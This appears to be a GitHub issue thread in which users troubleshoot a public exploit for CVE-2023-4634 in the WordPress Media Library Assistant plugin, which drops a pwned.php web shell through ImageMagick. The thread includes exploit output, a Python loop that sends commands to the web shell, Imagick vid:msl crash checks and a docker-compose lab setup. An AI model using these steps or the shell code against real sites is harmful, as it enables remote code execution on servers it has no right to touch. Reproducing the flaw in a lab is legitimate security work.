It doesn't work ;-?

[scotch123]

I only get this output:

[-] Checking arguments
[-] All arguments for exploiting target are set, beginning the first checks
[-] The remote FTP polyglot SVG/MSL file is reachable
[-] The remote FTP polyglot SVG/MSL file ending with [0] is reachable
[-] A sample remote FTP exploiter VID test file is reachable
[-] A sample Remote FTP exploiter VID test file ending with [0] is reachable
[-] The remote Exploit PNG/PHP file is reachable
[!] All arguments have been checked correctly, lauching exploitation
[-] Lauching 100 Threads on long SVG
[-] Waiting 5 second for the file to be created
[-] Starting Bruteforcing with VID exploiters
[-] Checking the drop of pwned.php
[!] Not yet, try 1 on 9 ... checking again in 10 seconds
[!] Not yet, try 2 on 9 ... checking again in 10 seconds
[!] Not yet, try 3 on 9 ... checking again in 10 seconds
[!] Not yet, try 4 on 9 ... checking again in 10 seconds
[!] Not yet, try 5 on 9 ... checking again in 10 seconds
[!] Not yet, try 6 on 9 ... checking again in 10 seconds
[!] Not yet, try 7 on 9 ... checking again in 10 seconds
[!] Not yet, try 8 on 9 ... checking again in 10 seconds
[!] Not yet, try 9 on 9 ... checking again in 10 seconds
[!] Exploit has not worked, try by increase concurrency value or use another method

Not able to reproduce it .. what I'm doing wrong ?

[Rapid0nion]

The same issue, doesn't work

[muX1337]

For me this exploit worked perfectly. Double check all the params and in my case what mostly killed this exploit are the Imagick libraries which weren't installed on the server or not the default setup.

[JsHuang]

For me this exploit worked perfectly. Double check all the params and in my case what mostly killed this exploit are the Imagick libraries which weren't installed on the server or not the default setup.

What's the imagick default setup？ I'm using the wordpress docker envrionment，and always failed to read the remote explot_XX.svg(the ftp setup is right), the log error is as bellow:

 _mla_die( 'Image load exception: unable to open file `/tmp/magick-fRWl3hgSjd-jy_KQdTbPr39aB2AwJMvU': No such file or directory @ error/constitute.c/ReadImage/614', '537', '404' )

[N00BIER]

For me this exploit worked perfectly. Double check all the params and in my case what mostly killed this exploit are the Imagick libraries which weren't installed on the server or not the default setup.

What's the imagick default setup？ I'm using the wordpress docker envrionment，and always failed to read the remote explot_XX.svg(the ftp setup is right), the log error is as bellow:

 _mla_die( 'Image load exception: unable to open file `/tmp/magick-fRWl3hgSjd-jy_KQdTbPr39aB2AwJMvU': No such file or directory @ error/constitute.c/ReadImage/614', '537', '404' )

try apt install imagemagick in your docker container... that should make it work.

[N00BIER]

one thing I cannot understand though is why we keep trying to get pwned.php multiple types...
another cosmetic change I would suggest is to add reverse shell to the script to have it in your terminal instead of using browser, just for the sake of convenience.

def shell(cmd, shell):
    response = requests.get(shell, params={"cmd": cmd})
    match = re.search(r'<pre>(.*)</pre>', response.text, re.DOTALL)
    if match:
        extracted_text = match.group(1).strip()
        print(extracted_text)
    else:
        return None
    return extracted_text
.....
while True:
   cmd = input("$ ")
   shell(cmd, target_virus)

[JsHuang]

For me this exploit worked perfectly. Double check all the params and in my case what mostly killed this exploit are the Imagick libraries which weren't installed on the server or not the default setup.

What's the imagick default setup？ I'm using the wordpress docker envrionment，and always failed to read the remote explot_XX.svg(the ftp setup is right), the log error is as bellow:

 _mla_die( 'Image load exception: unable to open file `/tmp/magick-fRWl3hgSjd-jy_KQdTbPr39aB2AwJMvU': No such file or directory @ error/constitute.c/ReadImage/614', '537', '404' )

try apt install imagemagick in your docker container... that should make it work.

after apt install imagemagick and restart the docker still get the same error

[N00BIER]

For me this exploit worked perfectly. Double check all the params and in my case what mostly killed this exploit are the Imagick libraries which weren't installed on the server or not the default setup.

What's the imagick default setup？ I'm using the wordpress docker envrionment，and always failed to read the remote explot_XX.svg(the ftp setup is right), the log error is as bellow:

 _mla_die( 'Image load exception: unable to open file `/tmp/magick-fRWl3hgSjd-jy_KQdTbPr39aB2AwJMvU': No such file or directory @ error/constitute.c/ReadImage/614', '537', '404' )

try apt install imagemagick in your docker container... that should make it work.

after apt install imagemagick and restart the docker still get the same error

It is hard to help without seeing your config... For the starter, you can post your dockerfile/docker-compose and phpinfo here...

[JsHuang]

Here is the phpinfo()
PHP 8.2.13 - phpinfo().zip
I'm using the official wordpress docker image using docker pull wordpress:latest

[N00BIER]

Here is the phpinfo() PHP 8.2.13 - phpinfo().zip I'm using the official wordpress docker image using docker pull wordpress:latest

Also, have you checked your /tmp folder for magick-*? do find / -regex ".*\/tmp\/magick-.*"
If positive, do the following checks in you docker container:
$php -r '$test = new Imagick("vid:msl:/tmp/magick-<first N symbols of existing file>*");' ---> the result should be segmentation fault
$composite patrowl.png text:./patrowl.txt patrowl_over.png ---> create your own files

[N00BIER]

Here is the phpinfo() PHP 8.2.13 - phpinfo().zip I'm using the official wordpress docker image using docker pull wordpress:latest

1. Use this docker-compose.yaml:

version: "3"
# Defines which compose version to use
services:
  # Services line define which Docker images to run. In this case, it will be MySQL server and WordPress image.
  db:
    image: mysql:5.7
    # image: mysql:5.7 indicates the MySQL database container image from Docker Hub used in this installation.
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: MyR00tMySQLPa$$5w0rD
      MYSQL_DATABASE: MyWordPressDatabaseName
      MYSQL_USER: MyWordPressUser
      MYSQL_PASSWORD: Pa$$5w0rD
      # Previous four lines define the main variables needed for the MySQL container to work: database, database username, database user password, and the MySQL root password.
  wordpress:
    depends_on:
      - db
    image: wordpress:6.0.1
    restart: always
    # Restart line controls the restart mode, meaning if the container stops running for any reason, it will restart the process immediately.
    ports:
      - "8000:80"
      # The previous line defines the port that the WordPress container will use. After successful installation, the full path will look like this: http://localhost:8000
    environment:
      WORDPRESS_DB_HOST: db:3306
      WORDPRESS_DB_USER: MyWordPressUser
      WORDPRESS_DB_PASSWORD: Pa$$5w0rD
      WORDPRESS_DB_NAME: MyWordPressDatabaseName
# Similar to MySQL image variables, the last four lines define the main variables needed for the WordPress container to work properly with the MySQL container.
    volumes:
      ["./:/var/www/html"]
volumes:
  mysql: {}

2. Place vulnerable version of MLA plugin to wp-content/plugins (https://downloads.wordpress.org/plugin/media-library-assistant.3.07.zip).
3. Go to your browser, install wordpress and activate MLA plugin. Do not upgrade it!
4. In your docker container do apt install imagemagick
5. Install Nuclei on you Kali or whatever box u r using and perform the following check nuclei -u http://<target IP:8000> -as ---> you should see "CVE-2023-4634 [Critical]" or something

[JsHuang]

Here is the phpinfo() PHP 8.2.13 - phpinfo().zip I'm using the official wordpress docker image using docker pull wordpress:latest

Also, have you checked your /tmp folder for magick-*? do find / -regex ".*\/tmp\/magick-.*" If positive, do the following checks in you docker container: $php -r '$test = new Imagick("vid:msl:/tmp/magick-<first N symbols of existing file>*")' ---> the result should be segmentation fault $composite patrowl.png text:./patrowl.txt patrowl_over.png ---> create your own files

the above steps seems no problem:

root@2cd3cfd78452:/tmp# php -r '$test = new Imagick("vid:msl:/tmp/magick-o*");'
Segmentation fault
root@2cd3cfd78452:/tmp# composite sample.png  text:./sample.txt sample_over.png
root@2cd3cfd78452:/tmp# 

I'll try with your docker-compose.yaml.
The plugin version I was testing is 3.09

[N00BIER]

Here is the phpinfo() PHP 8.2.13 - phpinfo().zip I'm using the official wordpress docker image using docker pull wordpress:latest

Also, have you checked your /tmp folder for magick-*? do find / -regex ".*\/tmp\/magick-.*" If positive, do the following checks in you docker container: $php -r '$test = new Imagick("vid:msl:/tmp/magick-<first N symbols of existing file>*")' ---> the result should be segmentation fault $composite patrowl.png text:./patrowl.txt patrowl_over.png ---> create your own files

the above steps seems no problem:

root@2cd3cfd78452:/tmp# php -r '$test = new Imagick("vid:msl:/tmp/magick-o*");'
Segmentation fault
root@2cd3cfd78452:/tmp# composite sample.png  text:./sample.txt sample_over.png
root@2cd3cfd78452:/tmp# 

I'll try with your docker-compose.yaml. The plugin version I was testing is 3.09

Well, it seems imagick is all set... Try to use my docker-compose file amd let me know if the issue still persists. In my config, imagemagick is < 7.0.0. I know that in >7.0.7 or 7.1.0 they've patched some widely exploited vulns.

[JsHuang]

Thanks @N00BIER, your docker compose file works.